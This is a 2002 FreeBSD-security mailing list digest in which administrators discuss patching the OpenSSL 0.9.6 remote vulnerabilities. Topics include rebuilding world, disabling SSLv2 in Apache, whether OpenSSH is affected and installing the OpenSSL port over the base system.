owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>> % strings /usr/local/libexec/apache/libssl.so | egrep "0\.9\.6" >>> OpenSSL 0.9.6a 5 Apr 2001 wollman> `ldd' will demonstrate that this string, whatever its function, does wollman> not come from the OpenSSL library. (The version of OpenSSL in FreeBSD wollman> has been 0.9.6c for quite some time.) Not in -STABLE. -STABLE had 0.9.6a. -CURRENT was the only FreeBSD version with 0.9.6c. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 11:58:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D6EB337B443 for ; Wed, 31 Jul 2002 11:58:29 -0700 (PDT) Received: from invert.com (invert.com [209.164.21.15]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5202A43E5E for ; Wed, 31 Jul 2002 11:58:28 -0700 (PDT) (envelope-from mlist-freebsd@alt255.com) Received: (from jburke@localhost) by invert.com (8.11.3/8.11.3) id g6VJ2N241456 for security@FreeBSD.ORG; Wed, 31 Jul 2002 12:02:23 -0700 (PDT) (envelope-from mlist-freebsd@alt255.com) Date: Wed, 31 Jul 2002 12:02:23 -0700 From: Justin Burke To: security@FreeBSD.ORG Subject: Re: OpenSSL workaround Message-ID: <20020731190223.GD38776@alt255.com> Mail-Followup-To: security@FreeBSD.ORG References: <20020731032131.GB38906@madman.nectar.cc> <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org> <20020731112841.GC26274@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020731112841.GC26274@madman.nectar.cc> User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * Jacques A. Vidrine (nectar@FreeBSD.ORG) wrote: > I recommend that you rebuild the system as descrbied in > . Also > rebuild third-party applications that use OpenSSL (either libssl or > libcrypto). > > Any applications that are rebuilt must also be restarted. Will the kernel need to be rebuilt? Thanks. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 12: 1:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8DFE837B400 for ; Wed, 31 Jul 2002 12:01:27 -0700 (PDT) Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1766443E3B for ; Wed, 31 Jul 2002 12:01:27 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 5B31854; Wed, 31 Jul 2002 14:01:26 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g6VJ1QU4018007; Wed, 31 Jul 2002 14:01:26 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g6VJ1NOr018006; Wed, 31 Jul 2002 14:01:23 -0500 (CDT) Date: Wed, 31 Jul 2002 14:01:23 -0500 From: "Jacques A. Vidrine" To: Justin Burke Cc: security@FreeBSD.ORG Subject: Re: OpenSSL workaround Message-ID: <20020731190123.GA17979@madman.nectar.cc> References: <20020731032131.GB38906@madman.nectar.cc> <0CDD655A-A472-11D6-AA2C-003065819B10@lunenburg.org> <20020731112841.GC26274@madman.nectar.cc> <20020731190223.GD38776@alt255.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020731190223.GD38776@alt255.com> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jul 31, 2002 at 12:02:23PM -0700, Justin Burke wrote: > * Jacques A. Vidrine (nectar@FreeBSD.ORG) wrote: > > I recommend that you rebuild the system as descrbied in > > . Also > > rebuild third-party applications that use OpenSSL (either libssl or > > libcrypto). > > > > Any applications that are rebuilt must also be restarted. > > > Will the kernel need to be rebuilt? Not for this. However, another fix went in a few moments ago that involves the kernel, so you might as well (after CVSup'ing, of course). Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 12:22:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 520C437B400 for ; Wed, 31 Jul 2002 12:22:47 -0700 (PDT) Received: from mighty.grot.org (mighty.grot.org [204.182.56.120]) by mx1.FreeBSD.org (Postfix) with ESMTP id 09FAE43E3B for ; Wed, 31 Jul 2002 12:22:47 -0700 (PDT) (envelope-from aditya@grot.org) Received: by mighty.grot.org (Postfix, from userid 515) id 873275D1C; Wed, 31 Jul 2002 12:22:41 -0700 (PDT) Newsgroups: gmane.comp.apache.mod-ssl.user Cc: freebsd-security@freebsd.org Subject: temporary workaround for most recent openssl remote exploit? X-Archive: encrypt From: Aditya Date: Wed, 31 Jul 2002 12:22:40 -0700 Message-ID: Organization: Grot Free Lines: 23 User-Agent: Gnus/5.090007 (Oort Gnus v0.07) XEmacs/21.4 (Common Lisp, i386--freebsd) Cancel-Lock: sha1:tQ2z/mW695KCP8JrHT/5LK+4tQA= MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Posted-To: gmane.comp.apache.mod-ssl.user Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following message is a courtesy copy of an article that has been posted to gmane.comp.apache.mod-ssl.user as well. The FreeBSD Security Advisory FreeBSD-SA-02:33.openssl says: IV. Workaround Disabling the SSL2 protocol in server applications should render server exploits harmless. There is no known workaround for client applications. and while I'm upgrading my systems, to limit my window of exposure, if I restart my Apache servers, with: SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:-SSLv2:+EXP:+eNULL (change +SSLv2 to -SSLv2) rather than the default: SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL will that be sufficient as a workaround? Thanks, Adi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 12:34:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BC6FF37B400 for ; Wed, 31 Jul 2002 12:34:09 -0700 (PDT) Received: from ady.warpnet.ro (ady.warpnet.ro [217.156.25.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 89AF143E67 for ; Wed, 31 Jul 2002 12:34:05 -0700 (PDT) (envelope-from ady@freebsd.ady.ro) Received: from localhost (ady@localhost) by ady.warpnet.ro (8.9.3/8.9.3) with ESMTP id WAA98774; Wed, 31 Jul 2002 22:33:48 +0300 (EEST) (envelope-from ady@freebsd.ady.ro) Date: Wed, 31 Jul 2002 22:33:48 +0300 (EEST) From: Adrian Penisoara X-Sender: ady@ady.warpnet.ro To: net@wsf.at Cc: Simon Dick , freebsd-security@FreeBSD.ORG Subject: Re: Are OpenSSL bugs related to OpenSSH ? In-Reply-To: <200207311127.g6VBRWY98818@www.wsf.at> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, What is the exact problem that affects OpenSSH by means of being linked with libcrypto ? Does it use any SSL mechanisms that were reported to be vulnerable ? PS: the (just released) FreeBSD adivory on OpenSSL vulnerabilitues doesn't mention the SSH binaries as being affected by the problems. Thank you, Ady (@freebsd.ady.ro) ____________________________________________________________________ | An age is called Dark not because the light fails to shine, but | | because people refuse to see it. | | -- James Michener, "Space" | On Wed, 31 Jul 2002 net@wsf.at wrote: > Simon Dick schrieb: > > > On Wed, 2002-07-31 at 10:24, Adrian Penisoara wrote: > > > Hi, > > > > > > Though I think that the recent OpenSSL buffer overflows don't imply > > > that OpenSSH is vulnerable, could someone please confirm this ? > > > > OpenSSH is linked against OpenSSL, so it's a possibility that it could > > be vulnerable, but unless you have ssh statically linked then updating > > your openssl version will fix any problems. > > > > Hi Simon, > > I think this is only true if your version of ssh/sshd was already > built with a recent version of OpenSSL (libcrypto.so.3). If your > ssh uses libcrypto.so.2, updating OpenSSL to 0.9.6e would still > leave your ssh vulnerable (same applies to any other build using > OpenSSL) > > Thomas > > BTW: which version of OpenSSL bumped so.2 -> so.3 ? > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 12:50:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ACF2337B400 for ; Wed, 31 Jul 2002 12:50:24 -0700 (PDT) Received: from net2.dinoex.sub.org (net2.dinoex.de [212.184.201.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8EBB743E65 for ; Wed, 31 Jul 2002 12:50:22 -0700 (PDT) (envelope-from dirk.meyer@dinoex.sub.org) Received: from net2.dinoex.sub.org (dinoex@net2.dinoex.sub.org [127.0.0.1]) by net2.dinoex.sub.org (8.12.5/8.12.5) with ESMTP id g6VJoA5H006579 for ; Wed, 31 Jul 2002 21:50:11 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) X-MDaemon-Deliver-To: Received: from gate.dinoex.sub.org (dinoex@localhost) by net2.dinoex.sub.org (8.12.5/8.12.5/Submit) with BSMTP id g6VJoAUh006561 for ; Wed, 31 Jul 2002 21:50:10 +0200 (CEST) (envelope-from dirk.meyer@dinoex.sub.org) To: freebsd-security@FreeBSD.ORG Message-ID: From: dirk.meyer@dinoex.sub.org (Dirk Meyer) Organization: privat Subject: Re: Are OpenSSL bugs related to OpenSSH ? Date: Wed, 31 Jul 2002 21:43:34 +0200 X-Mailer: Dinoex 1.79 References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at> <20020731151607.GD26793@madman.nectar.cc> X-Gateway: ZCONNECT gate.dinoex.sub.org [UNIX/Connect 0.94] X-PGP-Fingerprint: 44 16 EC 0A D3 3A 4F 28 8A 8A 47 93 F1 CF 2F 12 X-Copyright: (C) Copyright 2001 by Dirk Meyer -- All rights reserved. X-PGP-Key-Avail: mailto:pgp-public-keys@keys.de.pgp.net Subject:GET 0x331CDA5D X-ZC-VIA: 20020731000000S+2@dinoex.sub.org X-Accept-Language: de,en X-Noad: Please don't send me ad's by mail. I'm bored by this type of mail. X-Note: sending SPAM is a violation of both german and US law and will at least trigger a complaint at your provider's postmaster. X-No-Archive: yes Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Jacques A. Vidrine wrote: > I think the configure script is broken, and having the port library > version number artificially higher is not a great idea. :-( It is not fully configures fault, as I found now way to tell ld to link with the desired libssl.so it the nubers are equal. As the port version is newer or equal the version in the base, linking with libssl.so from the ports is desired. So if no port is installed everything compiles and links with the base version, and when the port is installed each port can link against it. The version BUMP makes this clear, even if the API is the same. Otherwise we have to hack about 200 ports to select. kind regards Dirk - Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany - [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 13:34: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BE07037B400 for ; Wed, 31 Jul 2002 13:34:03 -0700 (PDT) Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3BF3B43E5E for ; Wed, 31 Jul 2002 13:34:03 -0700 (PDT) (envelope-from dmp@pantherdragon.org) Received: from sparx.pantherdragon.org (evrtwa1-ar10-4-61-252-210.evrtwa1.dsl-verizon.net [4.61.252.210]) by spork.pantherdragon.org (Postfix) with ESMTP id 5123F471DC; Wed, 31 Jul 2002 13:34:02 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by sparx.pantherdragon.org (Postfix) with ESMTP id 81C2E10024; Tue, 30 Jul 2002 18:41:03 -0700 (PDT) Message-ID: <3D47402F.83B37CBA@pantherdragon.org> Date: Tue, 30 Jul 2002 18:41:03 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: gabriel_ambuehl@buz.ch Cc: Geir =?iso-8859-1?Q?R=E5ness?= , freebsd-security@freebsd.org Subject: Re: About the openssl hole References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <2115515250.20020730190434@buz.ch> <3D470873.5C42BF65@pantherdragon.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Gabriel Ambuehl wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > Hello Geir, > > Tuesday, July 30, 2002, 6:56:12 PM, you wrote: > > > I talked with an freind of mine who tried this solution, and he told > me that it where only one patch that failed. > > If you remove the patch "patch-ah" the build will go fine. > > > But as many know, the port of openssl will not completly replace the > core openssl. > > (You could see this if you build mod_ssl) > > Well I could live without mod_ssl for the next hours, but I can't just > go shutdown ssh on all boxes cause that would mean I'd have to go > onsite to some 4 NOCs (two of them on the other side of the world) to > have SSH get backup. Hmm. Maybe I'll just shut all SSL stuff down and > have the NOC monkeys reboot them when the patch is here.... > > What's happening (I suppose) is that the port gets installed to > /usr/local/lib whereas the the old version still is in /usr/lib where Use -DOPENSSL_OVERWRITE_BASE. I recommend people install the OpenSSL port anyway, it gives you all those nifty extra programs that the maintainer(s) for the in-base openssl has seen fit not to include. > it belongs to as part of the base system which means that you probably > have to overwrite the old lib by hand but I wouldn't want to guarantee > that nothing is going to break if you do this. I can say from personal experience that installing the openssl port with -DOPENSSL_OVERWRITE_BASE doesn't break anything I've found or use (openssh, mod_ssl, courier_imap, and postfix). > To make it short: it's > probably best to just wait and update your boxes ASAP Why take down the whole machine, when you can use a port to just patch the broke part? That's what was so great about the OpenSSH port, it let a lot of people who couldn't make world or reinstall upgrade their copies of OpenSSH. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 13:44:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0321037B400 for ; Wed, 31 Jul 2002 13:44:44 -0700 (PDT) Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6167B43E42 for ; Wed, 31 Jul 2002 13:44:43 -0700 (PDT) (envelope-from schulte+freebsd@nospam.schulte.org) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id EFFE92440D; Wed, 31 Jul 2002 15:44:41 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (carpnod.schulte.org [209.134.156.200]) by clink.schulte.org (Postfix) with ESMTP id 97138243F7; Wed, 31 Jul 2002 15:44:39 -0500 (CDT) Message-Id: <5.1.1.6.2.20020731153229.03e9f388@localhost> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Wed, 31 Jul 2002 15:44:11 -0500 To: dirk.meyer@dinoex.sub.org (Dirk Meyer), freebsd-security@FreeBSD.ORG From: Christopher Schulte Subject: Re: Are OpenSSL bugs related to OpenSSH ? In-Reply-To: References: <1028113366.1406.0.camel@linux> <200207311127.g6VBRWY98818@www.wsf.at> <20020731151607.GD26793@madman.nectar.cc> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:43 PM 7/31/2002 +0200, Dirk Meyer wrote: >The version BUMP makes this clear, even if the API is the same. >Otherwise we have to hack about 200 ports to select. I installed the 0.9.6e openssl port to overwrite base (-DOPENSSL_OVERWRITE_BASE) and relinked my critical apps. I added: NO_OPENSSL= true to /etc/make.conf Now when I want to update to a patched RELENG_4_6, and use the base openssl, should I: 1) deinstall the port 2) remove make.conf declaration 3) cvsup/make world 4) recompile my third party apps again, because /usr/lib/libcrypto.so.3 and /usr/lib/libssl.so.3 are not used by the base openssl I'm only a tad confused with number 4. Was the .2 -> .3 change made just within the port or within openssl itself? Thanks! >kind regards Dirk > >- Dirk Meyer, Im Grund 4, 34317 Habichtswald, Germany >- [dirk.meyer@dinoex.sub.org],[dirk.meyer@guug.de],[dinoex@FreeBSD.org] -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 13:58: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0E72437B408 for ; Wed, 31 Jul 2002 13:58:04 -0700 (PDT) Received: from absinthe2.dyndns.org (adsl-66-122-183-124.dsl.chic01.pacbell.net [66.122.183.124]) by mx1.FreeBSD.org (Postfix) with ESMTP id 632E643E4A for ; Wed, 31 Jul 2002 13:58:03 -0700 (PDT) (envelope-from fred@absinthe2.dyndns.org) Received: from absinthe2.dyndns.org (localhost [127.0.0.1]) by absinthe2.dyndns.org (8.12.3/8.12.3) with ESMTP id g6VKw2MG019729 for ; Wed, 31 Jul 2002 13:58:02 -0700 (PDT) (envelope-from fred@absinthe2.dyndns.org) Received: (from fred@localhost) by absinthe2.dyndns.org (8.12.3/8.12.3/Submit) id g6VKw23Q019728 for freebsd-security@freebsd.org; Wed, 31 Jul 2002 13:58:02 -0700 (PDT) Date: Wed, 31 Jul 2002 13:58:02 -0700 From: Fred Condo To: freebsd-security@freebsd.org Subject: Old SSL libraries lying around Message-ID: <20020731205802.GA14118@absinthe.condo.chico.ca.us> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org After doing a buildworld/installworld after the OpenSSL commits had been made to cvs, I did this: ll /usr/lib/libssl* -r--r--r-- 1 root wheel 234530 Jul 29 14:37 /usr/lib/libssl.a lrwxr-xr-x 1 root wheel 11 Jul 29 14:37 /usr/lib/libssl.so -> libssl.so.2 -r--r--r-- 1 root wheel 176348 Feb 14 2001 /usr/lib/libssl.so.1 -r--r--r-- 1 root wheel 177160 Jul 29 14:37 /usr/lib/libssl.so.2 -r--r--r-- 1 root wheel 247174 Aug 24 2001 /usr/lib/libssl_p.a Should I be concerned about the presence of the antiques from 2001? Should I delete them? -- Fred Condo - fred@condo.chico.ca.us Injustice anywhere is a threat to justice everywhere. -- Martin Luther King, Jr. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 14:29:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3873737B401 for ; Wed, 31 Jul 2002 14:29:24 -0700 (PDT) Received: from probsd.ws (ilm26-7-034.ec.rr.com [66.26.7.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7FB3743E67 for ; Wed, 31 Jul 2002 14:29:23 -0700 (PDT) (envelope-from freebsd@ec.rr.com) Received: from probsd.ws (probsd.ws [192.168.1.4]) by probsd.ws (Postfix) with SMTP id B868314BC8; Wed, 31 Jul 2002 17:32:09 -0400 (EDT) Message-ID: <2319.192.168.1.4.1028151129.squirrel@webmail.probsd.ws> Date: Wed, 31 Jul 2002 17:32:09 -0400 (EDT) Subject: Re: About the openssl hole From: "Michael Sharp" To: In-Reply-To: <3D47402F.83B37CBA@pantherdragon.org> References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <2115515250.20020730190434@buz.ch> <3D470873.5C42BF65@pantherdragon.org> <3D47402F.83B37CBA@pantherdragon.org> X-Priority: 3 Importance: Normal X-MSMail-Priority: Normal Cc: X-Mailer: SquirrelMail (version 1.2.7) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Regarding using a port to fix a core issue. I so toatally disagree. Each port/package that is installed on a FreeBSD box degrades the security profile in small increments. My thoughts, use core as much as you can, and use ports sparingly. I had 4 services exposed to the net that relied on the bad OpenSSL. I chose to wait out the core team to fix things. Yes, my website might have been down for 8 hrs, mail as well.. etc... but so what? However, I'm not a 1000 hit a day business either so I guess one could argue the wait for core/install a port issue there. But I have found that core typically goes right to work on a issue, and a fix is out within hrs. Just my 2 cents michael > Gabriel Ambuehl wrote: >> >> -----BEGIN PGP SIGNED MESSAGE----- >> >> Hello Geir, >> >> Tuesday, July 30, 2002, 6:56:12 PM, you wrote: >> >> > I talked with an freind of mine who tried this solution, and he told >> me that it where only one patch that failed. >> > If you remove the patch "patch-ah" the build will go fine. >> >> > But as many know, the port of openssl will not completly replace the >> core openssl. >> > (You could see this if you build mod_ssl) >> >> Well I could live without mod_ssl for the next hours, but I can't just >> go shutdown ssh on all boxes cause that would mean I'd have to go >> onsite to some 4 NOCs (two of them on the other side of the world) to >> have SSH get backup. Hmm. Maybe I'll just shut all SSL stuff down and >> have the NOC monkeys reboot them when the patch is here.... >> >> What's happening (I suppose) is that the port gets installed to >> /usr/local/lib whereas the the old version still is in /usr/lib where > > Use -DOPENSSL_OVERWRITE_BASE. I recommend people install the OpenSSL > port anyway, it gives you all those nifty extra programs that the > maintainer(s) for the in-base openssl has seen fit not to include. > >> it belongs to as part of the base system which means that you probably >> have to overwrite the old lib by hand but I wouldn't want to guarantee >> that nothing is going to break if you do this. > > I can say from personal experience that installing the openssl port with > -DOPENSSL_OVERWRITE_BASE doesn't break anything I've found or use > (openssh, mod_ssl, courier_imap, and postfix). > >> To make it short: it's >> probably best to just wait and update your boxes ASAP > > Why take down the whole machine, when you can use a port to just patch > the broke part? That's what was so great about the OpenSSH port, it let > a lot of people who couldn't make world or reinstall upgrade their > copies of OpenSSH. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 14:40:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0101237B400 for ; Wed, 31 Jul 2002 14:40:35 -0700 (PDT) Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4752743E31 for ; Wed, 31 Jul 2002 14:40:35 -0700 (PDT) (envelope-from dmp@pantherdragon.org) Received: from sparx.pantherdragon.org (evrtwa1-ar10-4-61-252-210.evrtwa1.dsl-verizon.net [4.61.252.210]) by spork.pantherdragon.org (Postfix) with ESMTP id 4004E471DC; Wed, 31 Jul 2002 14:40:34 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by sparx.pantherdragon.org (Postfix) with ESMTP id 2D35D1000D; Wed, 31 Jul 2002 14:40:33 -0700 (PDT) Message-ID: <3D485951.2C161CE6@pantherdragon.org> Date: Wed, 31 Jul 2002 14:40:33 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Michael Sharp Cc: freebsd-security@FreeBSD.ORG Subject: Re: About the openssl hole References: <004001c237cf$23c00560$fa00a8c0@elixor> <170112657687.20020730181657@buz.ch> <000d01c237e5$ceede1d0$fa00a8c0@elixor> <5113861671.20020730183701@buz.ch> <002301c237ea$04b4d4f0$fa00a8c0@elixor> <2115515250.20020730190434@buz.ch> <3D470873.5C42BF65@pantherdragon.org> <3D47402F.83B37CBA@pantherdragon.org> <2319.192.168.1.4.1028151129.squirrel@webmail.probsd.ws> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Michael Sharp wrote: > > Regarding using a port to fix a core issue. I so toatally disagree. > > Each port/package that is installed on a FreeBSD box degrades the security > profile in small increments. My thoughts, use core as much as you can, > and use ports sparingly. I had 4 services exposed to the net that relied > on the bad OpenSSL. I chose to wait out the core team to fix things. Yes, > my website might have been down for 8 hrs, mail as well.. etc... but so > what? However, I'm not a 1000 hit a day business either so I guess one > could argue the wait for core/install a port issue there. But I have found > that core typically goes right to work on a issue, and a fix is out within > hrs. This is quite true. However, the OpenSSH hooplah was proof that you can't discard using ports like this across the board. It's also proof that big bugs make big panic, which cause people to make mistakes (like fixing and unbroken OpenSSH). Now that openssl has been patched in stable, I will be cvsup'ing and rebuilding my world. I also had almost no downtime while I rebuilt my third-party stuff after going to v0.9.6e via ports. IMO, using ports like this is just like using patches on the base. Patches work well, they do the job and can mean getting something fixed a lot sooner than it would if you waited for core to merge it into the tree. Use patches too much, though, and you're going to make a mess of your system. This is why my machine is going to be doing buildworld while I'm at school tonight. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 31 15:11:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 80ACA37B400 for ; Wed, 31 Jul 2002 15:11:41 -0700 (PDT) Received: from mail.wsf.at (MAIL.WSF.AT [212.16.37.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 62CCA43E3B for ; Wed, 31 Jul 2002 15:11:40 -0700 (PDT) (envelope-from net@wsf.at) Received: (from root@localhost) by mail.wsf.at (8.11.6/8.9.3) id g6VMBdL06488 for freebsd-security@FreeBSD.ORG.KAV; Thu, 1 Aug 2002 00:11:39 +0200 (CEST) (envelope-from net@wsf.at) Received: from wsf.at (localhost [127.0.0.1]) by www.wsf.at (8.11.6/8.9.3) with SMTP id g6VMBcY06472; Thu, 1 Aug 2002 00:11:38 +0200 (CEST) (envelope-from net@wsf.at) Message-Id: <200207312211.g6VMBcY06472@www.wsf.at> Date: Wed, 31 Jul 2002 22:11:38 -0000 To: "Adrian Penisoara" Subject: Re: Are OpenSSL bugs related to OpenSSH ? From: "Thomas Wolf" X-Mailer: TWIG 2.6.2 In-Reply-To: Cc: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Adrian Penisoara schrieb: > On Wed, 31 Jul 2002 net@wsf.at wrote: > > > Simon Dick schrieb: > > > > > On Wed, 2002-07-31 at 10:24, Adrian Penisoara wrote: > > > > Hi, > > > > > > > > Though I think that the recent OpenSSL buffer overflows don't imply > > > > that OpenSSH is vulnerable, could someone please confirm this ? > > > > > > OpenSSH is linked against OpenSSL, so it's a possibility that it could > > > be 